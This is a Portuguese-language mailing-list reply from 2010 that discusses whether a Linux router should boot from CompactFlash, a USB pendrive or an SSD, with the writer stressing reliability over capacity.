<4CA52058020000460003A67F@d-gws03.jfsp.gov.br> References: <4CA52058020000460003A67F@d-gws03.jfsp.gov.br> Message-ID: <4CA54D9D.4020802@solutti.com.br> Em 30/09/2010 23:42, MARLON BORBA escreveu: > suponho por?m que as capacidades do pendrive sejam maiores e al?m disso > este seja mais barato, n?o? talvez sim .... mas pra um roteador o que vale ? a confiabilidade e, na grande maioria das vezes, voc? vai precisar no m?ximo de algumas poucas centenas de Mb pra instalar o SO que ser? utilizado. Se pendrive de 32Gb ? mais barato que um CF de 4Gb, grande coisa .... pra um roteador linux isso n?o deveria ser diferen?a. Se voc? precisa de muitos Gb no seu 'roteador', ent?o talvez um SSD seja a op??o inteligente ao inv?s de CF ou pendrive. -- Atenciosamente / Sincerily, Leonardo Rodrigues Solutti Tecnologia http://www.solutti.com.br Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My SPAMTRAP, do not email it